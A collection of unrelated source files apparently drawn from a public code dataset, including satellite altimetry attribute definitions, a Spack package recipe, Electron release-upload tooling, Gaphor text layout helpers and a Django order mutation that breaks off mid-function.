#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_20Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_20Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_20Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_LRM_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 20
#-- Number of echoes averaged
L1b_20Hz_LRM_wfm_attributes['N_avg_echoes'] = {}
L1b_20Hz_LRM_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of'
'echoes averaged')
L1b_20Hz_LRM_wfm_attributes['N_avg_echoes']['description'] = ('Normally '
'91 for LRM')
L1b_20Hz_LRM_wfm_attributes['N_avg_echoes']['hertz'] = 20
#-- Flags
L1b_20Hz_LRM_wfm_attributes['Flags'] = {}
L1b_20Hz_LRM_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_20Hz_LRM_wfm_attributes['Flags']['description'] = ('TRK cycle report '
'(as extracted from the L0). See table 2.3.4-4a of the "L1b Products '
'Format Specification" document')
L1b_20Hz_LRM_wfm_attributes['Flags']['hertz'] = 20
#-- SAR Mode
L1b_20Hz_SAR_wfm_attributes = {}
#-- Averaged Power Echo Waveform
L1b_20Hz_SAR_wfm_attributes['Waveform'] = {}
L1b_20Hz_SAR_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_20Hz_SAR_wfm_attributes['Waveform']['description'] = ('Array of 256 bins. '
'Averaged from a set of Doppler beam echoes formed at a common surface '
'location. Converted to Watts by using the scaling parameters. '
'Power in Watts = counts*(A*1e-9)*2^B.')
L1b_20Hz_SAR_wfm_attributes['Waveform']['valid_min'] = 0
L1b_20Hz_SAR_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_20Hz_SAR_wfm_attributes['Waveform']['hertz'] = 20
#-- Echo Scale Factor (to scale echo to watts)
L1b_20Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_20Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_20Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_SAR_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 20
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_20Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_20Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_20Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_SAR_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 20
#-- Number of echoes averaged
L1b_20Hz_SAR_wfm_attributes['N_avg_echoes'] = {}
L1b_20Hz_SAR_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of'
'echoes averaged')
L1b_20Hz_SAR_wfm_attributes['N_avg_echoes']['description'] = ('Normally 280'
' for SAR')
L1b_20Hz_SAR_wfm_attributes['N_avg_echoes']['hertz'] = 20
#-- Flags
L1b_20Hz_SAR_wfm_attributes['Flags'] = {}
L1b_20Hz_SAR_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_20Hz_SAR_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-4b of the "L1b Products '
'Format Specification" document')
L1b_20Hz_SAR_wfm_attributes['Flags']['hertz'] = 20
#-- Beam Behavior Parameters
L1b_20Hz_SAR_wfm_attributes['Beam'] = L1b_BB_attributes
#-- SARIN Mode
L1b_20Hz_SARIN_wfm_attributes = {}
#-- Averaged Power Echo Waveform
L1b_20Hz_SARIN_wfm_attributes['Waveform'] = {}
L1b_20Hz_SARIN_wfm_attributes['Waveform']['long_name'] = 'Averaged Power Echo'
L1b_20Hz_SARIN_wfm_attributes['Waveform']['description'] = ('Array of 1024 bins. '
'Averaged from 2 sets of Doppler beam echoes formed (on 2 receive '
'channels) at a common surface location. Converted to Watts by using '
'the scaling parameters. Power in Watts = counts*(A*1e-9)*2^B.')
L1b_20Hz_SARIN_wfm_attributes['Waveform']['valid_min'] = 0
L1b_20Hz_SARIN_wfm_attributes['Waveform']['valid_max'] = 65535
L1b_20Hz_SARIN_wfm_attributes['Waveform']['hertz'] = 20
#-- Echo Scale Factor (to scale echo to watts)
L1b_20Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier'] = {}
L1b_20Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale factor "A"')
L1b_20Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['description'] = ('"A" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_SARIN_wfm_attributes['Linear_Wfm_Multiplier']['hertz'] = 20
#-- Echo Scale Power (a power of 2 to scale echo to Watts)
L1b_20Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier'] = {}
L1b_20Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['long_name'] = ('Echo '
'Scale power "B"')
L1b_20Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['description'] = ('"B" '
'Parameter to scale echo to Watts. Power in Watts = counts*(A*1e-9)*2^B')
L1b_20Hz_SARIN_wfm_attributes['Power2_Wfm_Multiplier']['hertz'] = 20
#-- Number of echoes averaged
L1b_20Hz_SARIN_wfm_attributes['N_avg_echoes'] = {}
L1b_20Hz_SARIN_wfm_attributes['N_avg_echoes']['long_name'] = ('Number of'
'echoes averaged')
L1b_20Hz_SARIN_wfm_attributes['N_avg_echoes']['description'] = ('Normally 70'
' for SARIN')
L1b_20Hz_SARIN_wfm_attributes['N_avg_echoes']['hertz'] = 20
#-- Flags
L1b_20Hz_SARIN_wfm_attributes['Flags'] = {}
L1b_20Hz_SARIN_wfm_attributes['Flags']['long_name'] = 'Flags'
L1b_20Hz_SARIN_wfm_attributes['Flags']['description'] = ('For errors or '
'information about echoes. See table 2.3.4-4b of the "L1b Products '
'Format Specification" document')
L1b_20Hz_SARIN_wfm_attributes['Flags']['hertz'] = 20
#-- Coherence [1024]: packed units (1/1000)
L1b_20Hz_SARIN_wfm_attributes['Coherence'] = {}
L1b_20Hz_SARIN_wfm_attributes['Coherence']['long_name'] = 'Coherence'
L1b_20Hz_SARIN_wfm_attributes['Coherence']['description'] = ('Array of '
'1024 bins. Computed from the complex echoes on the 2 Rx channels')
L1b_20Hz_SARIN_wfm_attributes['Coherence']['units'] = '1/1000'
L1b_20Hz_SARIN_wfm_attributes['Coherence']['hertz'] = 20
#-- Phase Difference [1024]: packed units (microradians)
L1b_20Hz_SARIN_wfm_attributes['Phase_diff'] = {}
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['long_name'] = 'Phase Difference'
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['description'] = ('Array of '
'1024 bins. Computed from the complex echoes on the 2 Rx channels')
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['units'] = 'microradians'
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['valid_min'] = -3141593
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['valid_max'] = 3141593
L1b_20Hz_SARIN_wfm_attributes['Phase_diff']['hertz'] = 20
#-- Beam Behavior Parameters
L1b_20Hz_SARIN_wfm_attributes['Beam'] = L1b_BB_attributes
#-- Bind all the l1b attributes together into single dictionary
CS_l1b_attrib = {}
CS_l1b_attrib['Location'] = L1b_location_attributes
CS_l1b_attrib['Data'] = L1b_measurement_attributes
CS_l1b_attrib['Geometry'] = L1b_corr_attributes
if (MODE == 'LRM'):
CS_l1b_attrib['Waveform_1Hz'] = L1b_1Hz_LRM_wfm_attributes
CS_l1b_attrib['Waveform_20Hz'] = L1b_20Hz_LRM_wfm_attributes
elif (MODE == 'SAR'):
CS_l1b_attrib['Waveform_1Hz'] = L1b_1Hz_SAR_wfm_attributes
CS_l1b_attrib['Waveform_20Hz'] = L1b_20Hz_SAR_wfm_attributes
elif (MODE == 'SIN'):
CS_l1b_attrib['Waveform_1Hz'] = L1b_1Hz_SARIN_wfm_attributes
CS_l1b_attrib['Waveform_20Hz'] = L1b_20Hz_SARIN_wfm_attributes
#-- return the output dictionary
return CS_l1b_attrib
|
the-stack_106_23871 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RFlexclust(RPackage):
"""Flexible Cluster Algorithms.
The main function kcca implements a general framework for k-centroids
cluster analysis supporting arbitrary distance measures and centroid
computation. Further cluster methods include hard competitive learning,
neural gas, and QT clustering. There are numerous visualization methods for
cluster results (neighborhood graphs, convex cluster hulls, barcharts of
centroids, ...), and bootstrap methods for the analysis of cluster
stability."""
cran = "flexclust"
version('1.4-0', sha256='82fe445075a795c724644864c7ee803c5dd332a89ea9e6ccf7cd1ae2d1ecfc74')
version('1.3-5', sha256='dbf49969c93a7b314d9dc3299a0764ed9a804ba7dcbdc08a1235f244f4b85059')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('r-lattice', type=('build', 'run'))
depends_on('r-modeltools', type=('build', 'run'))
depends_on('r-class', type=('build', 'run'))
|
the-stack_106_23872 | #!/usr/bin/env python3
import unittest
from collections import namedtuple
from bunkai.algorithm.bunkai_sbd.annotator.emoji_annotator import EmojiAnnotator
from bunkai.base.annotation import Annotations
from .annotation_test_base import TestAnnotatorBase, TestInstance
MorphResult = namedtuple("MorphResult", ("input_text", "seq_newline_position"))
class TestMorphAnnotator(TestAnnotatorBase):
def setUp(self) -> None:
self.test_input = [
MorphResult("うーん🤔🤔🤔どうしよう", [6]),
MorphResult("ビール🍺のみたい。️Frankfurtの🍺はKrombacher", []),
MorphResult("これが文⬆️", [5]),
MorphResult("1文目😄2文目😚3文目😙4文目😄😙おわり。", [4, 8, 12, 17]),
]
def test_emoji_detector(self):
emoji_annotator = EmojiAnnotator()
for test_tuple in self.test_input:
ann = Annotations()
result = emoji_annotator.annotate(test_tuple.input_text, spans=ann)
self.assertEqual(set([s.end_index for s in result.get_final_layer()]), set(test_tuple.seq_newline_position))
def test_annotate(self):
test_input = [
TestInstance("うーん🤔🤔🤔どうしよう", n_sentence=2, expected_rules=[EmojiAnnotator.__name__]),
TestInstance("ビール🍺のみたい。️Frankfurtの🍺はKrombacher", n_sentence=2, expected_rules=[]),
TestInstance("これが文⬆️", n_sentence=1, expected_rules=[EmojiAnnotator.__name__]),
TestInstance("1文目😄2文目😚3文目😙4文目😄😙おわり。", n_sentence=5, expected_rules=[EmojiAnnotator.__name__]),
]
annotator = EmojiAnnotator()
self.is_check_test_instance(annotator=annotator, test_cases=test_input)
if __name__ == "__main__":
unittest.main()
|
the-stack_106_23873 | #!/usr/bin/env python
import argparse
import errno
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
from io import StringIO
from lib.config import PLATFORM, get_target_arch, get_env_var, s3_config, \
get_zip_name
from lib.util import electron_gyp, execute, get_electron_version, \
parse_version, scoped_cwd, s3put
from lib.github import GitHub
ELECTRON_REPO = 'electron/electron'
ELECTRON_VERSION = get_electron_version()
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
DIST_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION)
SYMBOLS_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'symbols')
DSYM_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'dsym')
PDB_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'pdb')
def main():
args = parse_args()
if not args.publish_release:
if not dist_newer_than_head():
run_python_script('create-dist.py')
build_version = get_electron_build_version()
if not ELECTRON_VERSION.startswith(build_version):
error = 'Tag name ({0}) should match build version ({1})\n'.format(
ELECTRON_VERSION, build_version)
sys.stderr.write(error)
sys.stderr.flush()
return 1
github = GitHub(auth_token())
releases = github.repos(ELECTRON_REPO).releases.get()
tag_exists = False
for release in releases:
if not release['draft'] and release['tag_name'] == args.version:
tag_exists = True
break
release = create_or_get_release_draft(github, releases, args.version,
tag_exists)
if args.publish_release:
# Upload the Node SHASUMS*.txt.
run_python_script('upload-node-checksums.py', '-v', ELECTRON_VERSION)
# Upload the index.json.
run_python_script('upload-index-json.py')
# Create and upload the Electron SHASUMS*.txt
release_electron_checksums(github, release)
# Press the publish button.
publish_release(github, release['id'])
# TODO: run publish-to-npm script here
# Do not upload other files when passed "-p".
return
# Upload Electron with GitHub Releases API.
upload_electron(github, release, os.path.join(DIST_DIR, DIST_NAME))
upload_electron(github, release, os.path.join(DIST_DIR, SYMBOLS_NAME))
if PLATFORM == 'darwin':
upload_electron(github, release, os.path.join(DIST_DIR,
'electron-api.json'))
upload_electron(github, release, os.path.join(DIST_DIR, 'electron.d.ts'))
upload_electron(github, release, os.path.join(DIST_DIR, DSYM_NAME))
elif PLATFORM == 'win32':
upload_electron(github, release, os.path.join(DIST_DIR, PDB_NAME))
# Upload free version of ffmpeg.
ffmpeg = get_zip_name('ffmpeg', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, ffmpeg))
# Upload chromedriver and mksnapshot for minor version update.
if parse_version(args.version)[2] == '0':
chromedriver = get_zip_name('chromedriver', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, chromedriver))
mksnapshot = get_zip_name('mksnapshot', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, mksnapshot))
if PLATFORM == 'win32' and not tag_exists:
# Upload PDBs to Windows symbol server.
run_python_script('upload-windows-pdb.py')
# Upload node headers.
run_python_script('create-node-headers.py', '-v', args.version)
run_python_script('upload-node-headers.py', '-v', args.version)
def parse_args():
parser = argparse.ArgumentParser(description='upload distribution file')
parser.add_argument('-v', '--version', help='Specify the version',
default=ELECTRON_VERSION)
parser.add_argument('-p', '--publish-release',
help='Publish the release',
action='store_true')
return parser.parse_args()
def run_python_script(script, *args):
script_path = os.path.join(SOURCE_ROOT, 'script', script)
return execute([sys.executable, script_path] + list(args))
def get_electron_build_version():
if get_target_arch().startswith('arm') or os.environ.has_key('CI'):
# In CI we just build as told.
return ELECTRON_VERSION
if PLATFORM == 'darwin':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.app'.format(PRODUCT_NAME), 'Contents',
'MacOS', PRODUCT_NAME)
elif PLATFORM == 'win32':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.exe'.format(PROJECT_NAME))
else:
electron = os.path.join(SOURCE_ROOT, 'out', 'R', PROJECT_NAME)
return subprocess.check_output([electron, '--version']).strip()
def dist_newer_than_head():
with scoped_cwd(SOURCE_ROOT):
try:
head_time = subprocess.check_output(['git', 'log', '--pretty=format:%at',
'-n', '1']).strip()
dist_time = os.path.getmtime(os.path.join(DIST_DIR, DIST_NAME))
except OSError as e:
if e.errno != errno.ENOENT:
raise
return False
return dist_time > int(head_time)
def get_text_with_editor(name):
editor = os.environ.get('EDITOR', 'nano')
initial_message = '\n# Please enter the body of your release note for %s.' \
% name
t = tempfile.NamedTemporaryFile(suffix='.tmp', delete=False)
t.write(initial_message)
t.close()
subprocess.call([editor, t.name])
text = ''
for line in open(t.name, 'r'):
if len(line) == 0 or line[0] != '#':
text += line
os.unlink(t.name)
return text
def create_or_get_release_draft(github, releases, tag, tag_exists):
# Search for existing draft.
for release in releases:
if release['draft']:
return release
if tag_exists:
tag = 'do-not-publish-me'
return create_release_draft(github, tag)
def create_release_draft(github, tag):
name = '{0} {1} beta'.format(PROJECT_NAME, tag)
if os.environ.has_key('CI'):
body = '(placeholder)'
else:
body = get_text_with_editor(name)
if body == '':
sys.stderr.write('Quit due to empty release note.\n')
sys.exit(0)
data = dict(tag_name=tag, name=name, body=body, draft=True, prerelease=True)
r = github.repos(ELECTRON_REPO).releases.post(data=data)
return r
def release_electron_checksums(github, release):
checksums = run_python_script('merge-electron-checksums.py',
'-v', ELECTRON_VERSION)
upload_io_to_github(github, release, 'SHASUMS256.txt',
StringIO(checksums.decode('utf-8')), 'text/plain')
def upload_electron(github, release, file_path):
# Delete the original file before uploading in CI.
filename = os.path.basename(file_path)
if os.environ.has_key('CI'):
try:
for asset in release['assets']:
if asset['name'] == filename:
github.repos(ELECTRON_REPO).releases.assets(asset['id']).delete()
except Exception:
pass
# Upload the file.
with open(file_path, 'rb') as f:
upload_io_to_github(github, release, filename, f, 'application/zip')
# Upload the checksum file.
upload_sha256_checksum(release['tag_name'], file_path)
# Upload ARM assets without the v7l suffix for backwards compatibility
# TODO Remove for 2.0
if 'armv7l' in filename:
arm_filename = filename.replace('armv7l', 'arm')
arm_file_path = os.path.join(os.path.dirname(file_path), arm_filename)
shutil.copy2(file_path, arm_file_path)
upload_electron(github, release, arm_file_path)
def upload_io_to_github(github, release, name, io, content_type):
params = {'name': name}
headers = {'Content-Type': content_type}
github.repos(ELECTRON_REPO).releases(release['id']).assets.post(
params=params, headers=headers, data=io, verify=False)
def upload_sha256_checksum(version, file_path):
bucket, access_key, secret_key = s3_config()
checksum_path = '{}.sha256sum'.format(file_path)
sha256 = hashlib.sha256()
with open(file_path, 'rb') as f:
sha256.update(f.read())
filename = os.path.basename(file_path)
with open(checksum_path, 'w') as checksum:
checksum.write('{} *{}'.format(sha256.hexdigest(), filename))
s3put(bucket, access_key, secret_key, os.path.dirname(checksum_path),
'atom-shell/tmp/{0}'.format(version), [checksum_path])
def publish_release(github, release_id):
data = dict(draft=False)
github.repos(ELECTRON_REPO).releases(release_id).patch(data=data)
def auth_token():
token = get_env_var('GITHUB_TOKEN')
message = ('Error: Please set the $ELECTRON_GITHUB_TOKEN '
'environment variable, which is your personal token')
assert token, message
return token
if __name__ == '__main__':
import sys
sys.exit(main())
|
the-stack_106_23875 | """Support classes for dealing with text."""
from typing import Tuple, Union
import gi
from gaphas.canvas import instant_cairo_context
from gaphas.freehand import FreeHandCairoContext
from gaphas.geometry import Rectangle
from gaphas.painter import CairoBoundingBoxContext
from gaphor.core.styling import FontStyle, FontWeight, Style, TextAlign, TextDecoration
# fmt: off
gi.require_version('PangoCairo', '1.0') # noqa: isort:skip
from gi.repository import GLib, Pango, PangoCairo # noqa: isort:skip
# fmt: on
class Layout:
def __init__(
self, text="", font=None, text_align=TextAlign.CENTER, default_size=(0, 0),
):
self.layout = PangoCairo.create_layout(instant_cairo_context())
self.underline = False
self.font_id = None
self.text = ""
self.width = -1
self.default_size = default_size
if font:
self.set_font(font)
if text:
self.set_text(text)
self.set_alignment(text_align)
def set(self, text=None, font=None, width=None, text_align=None):
# Since text expressions can return False, we should also accomodate for that
if text not in (None, False):
self.set_text(text)
if font:
self.set_font(font)
if width is not None:
self.set_width(width)
if text_align:
self.set_alignment(text_align)
def set_font(self, font: Style):
font_family = font.get("font-family")
font_size = font.get("font-size")
font_weight = font.get("font-weight")
font_style = font.get("font-style")
assert font_family, "Font family should be set"
assert font_size, "Font size should be set"
font_id = (font_family, font_size, font_weight, font_style)
if font_id == self.font_id:
return
self.font_id = font_id
fd = Pango.FontDescription.new()
fd.set_family(font_family)
fd.set_absolute_size(font_size * Pango.SCALE)
if font_weight:
assert isinstance(font_weight, FontWeight)
fd.set_weight(getattr(Pango.Weight, font_weight.name))
if font_style:
assert isinstance(font_style, FontStyle)
fd.set_style(getattr(Pango.Style, font_style.name))
self.layout.set_font_description(fd)
underline = (
font.get("text-decoration", TextDecoration.NONE) == TextDecoration.UNDERLINE
)
if self.underline != underline:
self.underline = underline
self.update_text()
def set_text(self, text: str):
if text != self.text:
self.text = text
self.update_text()
def update_text(self):
if self.underline:
# TODO: can this be done via Pango attributes instead?
self.layout.set_markup(
f"<u>{GLib.markup_escape_text(self.text)}</u>", length=-1
)
else:
self.layout.set_text(self.text, length=-1)
def set_width(self, width: int):
self.width = width
if width == -1:
self.layout.set_width(-1)
else:
self.layout.set_width(int(width * Pango.SCALE))
def set_alignment(self, text_align: TextAlign):
self.layout.set_alignment(getattr(Pango.Alignment, text_align.name))
def size(self):
if not self.text:
return self.default_size
self.set_width(self.width)
return self.layout.get_pixel_size()
def show_layout(self, cr, width=None, default_size=None):
layout = self.layout
if not self.text:
return default_size or self.default_size
if width is not None:
layout.set_width(int(width * Pango.SCALE))
if isinstance(cr, FreeHandCairoContext):
PangoCairo.show_layout(cr.cr, layout)
elif isinstance(cr, CairoBoundingBoxContext):
w, h = layout.get_pixel_size()
cr.rel_line_to(w, h)
cr.stroke()
else:
PangoCairo.show_layout(cr, layout)
def focus_box_pos(
bounding_box: Rectangle,
text_size: Tuple[Union[float, int], Union[float, int]],
text_align: TextAlign,
) -> Tuple[int, int]:
"""Calculate the focus box position based on alignment style."""
x, y, width, height = bounding_box
w, h = text_size
if text_align is TextAlign.CENTER:
x += (width - w) / 2
elif text_align is TextAlign.RIGHT:
x += width - w
y += (height - h) / 2
return x, y
def text_point_at_line(points, size, text_align):
"""Provide a position (x, y) to draw a text close to a line.
Parameters:
- points: the line points, a list of (x, y) points
- size: size of the text, a (width, height) tuple
- text_align: alignment to the line: left, beginning of the line, center, middle and right: end of the line
"""
if text_align == TextAlign.LEFT:
p0 = points[0]
p1 = points[1]
x, y = _text_point_at_line_end(size, p0, p1)
elif text_align == TextAlign.CENTER:
p0, p1 = middle_segment(points)
x, y = _text_point_at_line_center(size, p0, p1)
elif text_align == TextAlign.RIGHT:
p0 = points[-1]
p1 = points[-2]
x, y = _text_point_at_line_end(size, p0, p1)
return x, y
def middle_segment(points):
"""Get middle line segment."""
m = len(points) // 2
assert m >= 1 and m < len(points)
return points[m - 1], points[m]
def _text_point_at_line_end(size, p1, p2):
"""Calculate position of the text relative to a line defined by points p1
and p2.
Parameters:
- size: text size, a (width, height) tuple
- p1: beginning of line segment
- p2: end of line segment
"""
name_dx = 0.0
name_dy = 0.0
ofs = 5
dx = float(p2[0]) - float(p1[0])
dy = float(p2[1]) - float(p1[1])
name_w, name_h = size
if dy == 0:
rc = 1000.0 # quite a lot...
else:
rc = dx / dy
abs_rc = abs(rc)
h = dx > 0 # right side of the box
v = dy > 0 # bottom side
if abs_rc > 6:
# horizontal line
if h:
name_dx = ofs
name_dy = -ofs - name_h
else:
name_dx = -ofs - name_w
name_dy = -ofs - name_h
elif 0 <= abs_rc <= 0.2:
# vertical line
if v:
name_dx = -ofs - name_w
name_dy = ofs
else:
name_dx = -ofs - name_w
name_dy = -ofs - name_h
else:
# Should both items be placed on the same side of the line?
r = abs_rc < 1.0
# Find out alignment of text (depends on the direction of the line)
align_left = h ^ r
align_bottom = v ^ r
if align_left:
name_dx = ofs
else:
name_dx = -ofs - name_w
if align_bottom:
name_dy = -ofs - name_h
else:
name_dy = ofs
return p1[0] + name_dx, p1[1] + name_dy
# hint tuples to move text depending on quadrant
WIDTH_HINT = (-1, -1, 0)
PADDING_HINT = (1, 1, -1)
EPSILON = 1e-6
def _text_point_at_line_center(size, p1, p2):
"""Calculate position of the text relative to a line defined by points p1
and p2.
Parameters:
- size: text size, a (width, height) tuple
- p1: beginning of line
- p2: end of line
"""
x0 = (p1[0] + p2[0]) / 2.0
y0 = (p1[1] + p2[1]) / 2.0
dx = p2[0] - p1[0]
dy = p2[1] - p1[1]
ofs = 3
if abs(dx) < EPSILON:
d1 = -1.0
d2 = 1.0
elif abs(dy) < EPSILON:
d1 = 0.0
d2 = 0.0
else:
d1 = dy / dx
d2 = abs(d1)
width, height = size
# move to center and move by delta depending on line angle
if d2 < 0.5774: # <0, 30>, <150, 180>, <-180, -150>, <-30, 0>
# horizontal mode
w2 = width / 2.0
hint = w2 * d2
x = x0 - w2
y = y0 + hint + ofs
else:
# much better in case of vertical lines
# determine quadrant, we are interested in 1 or 3 and 2 or 4
# see hint tuples below
h2 = height / 2.0
q = (d1 > 0) - (d1 < 0)
hint = 0 if abs(dx) < EPSILON else h2 / d2
x = x0 - hint + width * WIDTH_HINT[q]
x = x0 - (ofs + hint) * PADDING_HINT[q] + width * WIDTH_HINT[q]
y = y0 - h2
return x, y
|
the-stack_106_23877 | __author__ = 'socuialmoneydev'
from ConfigParser import SafeConfigParser
import os.path
import base64
class Connection(object):
defaultApiKey = None
defaultApiSecret = None
defaultDomainName = None
defaultProxyServer = None
defaultProxyPort = None
defaultConfigFilePath = os.path.join(os.path.dirname(__file__), '..', 'config.ini')
@staticmethod
def createFromConfig(configFilePath = None):
c = Connection(configFilePath)
c.apiKey = Connection.defaultApiKey
c.apiSecret = Connection.defaultApiSecret
c.domainName = Connection.defaultDomainName
c.proxyServer = Connection.defaultProxyServer
c.proxyPort = Connection.defaultProxyPort
return c
def __init__(self, configFilePath = None):
configFile = configFilePath or Connection.defaultConfigFilePath
if Connection.defaultApiKey == None and os.path.isfile(configFile):
parser = SafeConfigParser()
parser.read(configFile)
Connection.defaultApiKey = parser.get('CorePro', 'CoreProApiKey')
Connection.defaultApiSecret = parser.get('CorePro', 'CoreProApiSecret')
Connection.defaultDomainName = parser.get('CorePro', 'CoreProDomainName')
Connection.defaultProxyServer = parser.get('CorePro', 'CoreProProxyServer')
Connection.defaultProxyPort = parser.get('CorePro', 'CoreProProxyPort')
self.apiKey = Connection.defaultApiKey
self.apiSecret = Connection.defaultApiSecret
self.domainName = Connection.defaultDomainName
self._headerValue = None
self.proxyServer = Connection.defaultProxyServer
self.proxyPort = Connection.defaultProxyPort
@property
def headerValue(self):
if self._headerValue == None:
b64 = base64.b64encode(unicode("{0}:{1}".format(self.apiKey, self.apiSecret)))
self._headerValue = "Basic {0}".format(b64)
return self._headerValue
|
the-stack_106_23878 | """Example how to reproject by interpolation.
"""
import numpy as np
from astropy.io import fits
from astropy.wcs import WCS
from wcsaxes import datasets
from reproject.interpolation import reproject_celestial_slices
# Test 2d interpolation, different frame, different projection
hdu = datasets.msx_hdu()
hdu.data[100:200, 100:200] = np.inf
wcs_in = WCS(hdu.header)
wcs_out = wcs_in.deepcopy()
wcs_out.wcs.ctype = ['RA---TAN', 'DEC--TAN']
wcs_out.wcs.crval = [266.44707, -28.937888]
array_out = reproject_celestial_slices(hdu.data, wcs_in, wcs_out, hdu.data.shape)
fits.writeto('test_2d.fits', array_out,
header=wcs_out.to_header(), clobber=True)
# Test 3d slice-by-slice interpolation, different frame, different projection
hdu = datasets.l1448_co_hdu()
wcs_in = WCS(hdu.header)
wcs_in.wcs.equinox = 2000.
wcs_out = wcs_in.deepcopy()
wcs_out.wcs.ctype = ['GLON-SIN', 'GLAT-SIN', wcs_in.wcs.ctype[2]]
wcs_out.wcs.crval = [158.0501, -21.530282, wcs_in.wcs.crval[2]]
wcs_out.wcs.crpix = [50., 50., wcs_in.wcs.crpix[2]]
array_out = reproject_celestial_slices(hdu.data, wcs_in, wcs_out, hdu.data.shape)
fits.writeto('test_3d.fits', array_out,
header=wcs_out.to_header(), clobber=True)
|
the-stack_106_23879 | import time
from beeline_navigator import explore
from natsort import natsorted
from os import listdir
from os.path import isfile, join
def get_valid_wad_paths(wad_dir):
all_files = [f for f in listdir(wad_dir) if isfile(join(wad_dir, f))]
wad_files = [f for f in all_files if f.endswith('wad')]
wad_paths = [join(wad_dir, f) for f in wad_files]
wad_paths = natsorted(wad_paths)
return wad_paths
default_cfg_path = './explorer.cfg'
wad_dir = '../../data/maps/out'
wad_paths = get_valid_wad_paths(wad_dir)
num_explorations = 5
for idx, wad_path in enumerate(wad_paths):
wad_id = wad_path.split('/')[-1].split('_')[1]
start = time.time()
for i in range(num_explorations):
explore(default_cfg_path, wad_path, i,
lmp_out_dir='../../data/exploration')
end = time.time()
elapsed_time = end - start
print('Finished exploring map {} for {} times in {}s'.format(
idx, num_explorations, elapsed_time
))
|
the-stack_106_23882 | import typing
from urllib.parse import urljoin
import strawberry
from django.conf import settings
from django.utils.translation import gettext_lazy as _
from api.permissions import IsAuthenticated
from conferences.models.conference import Conference
from hotels.models import HotelRoom, HotelRoomReservation
from pretix import CreateOrderHotelRoom, CreateOrderInput, Order, create_order
from pretix.exceptions import PretixError
@strawberry.type
class CreateOrderResult:
payment_url: str
@strawberry.type
class Error:
message: str
@strawberry.type
class OrdersMutations:
@strawberry.mutation(permission_classes=[IsAuthenticated])
def create_order(
self, info, conference: str, input: CreateOrderInput
) -> typing.Union[CreateOrderResult, Error]:
conference_obj = Conference.objects.get(code=conference)
validation_error = validate_hotel_rooms(
input.hotel_rooms, conference=conference_obj
)
if validation_error:
return validation_error
try:
pretix_order = create_order(conference_obj, input)
except PretixError as e:
return Error(message=e.message)
if len(input.hotel_rooms) > 0:
create_hotel_reservations(
pretix_order, input.hotel_rooms, user_id=info.context.request.user.id
)
return_url = urljoin(
settings.FRONTEND_URL,
f"/{input.locale}/orders/{pretix_order.code}/confirmation",
)
if pretix_order.payment_url is None:
return CreateOrderResult(payment_url=return_url)
payment_url = pretix_order.payment_url
payment_url += f"?return_url={return_url}"
return CreateOrderResult(payment_url=payment_url)
def validate_hotel_rooms(hotel_rooms: typing.List[CreateOrderHotelRoom], *, conference):
count_rooms = {}
conference_start = conference.start.date()
conference_end = conference.end.date()
for order_room in hotel_rooms:
try:
room = HotelRoom.objects.get(id=order_room.room_id, conference=conference)
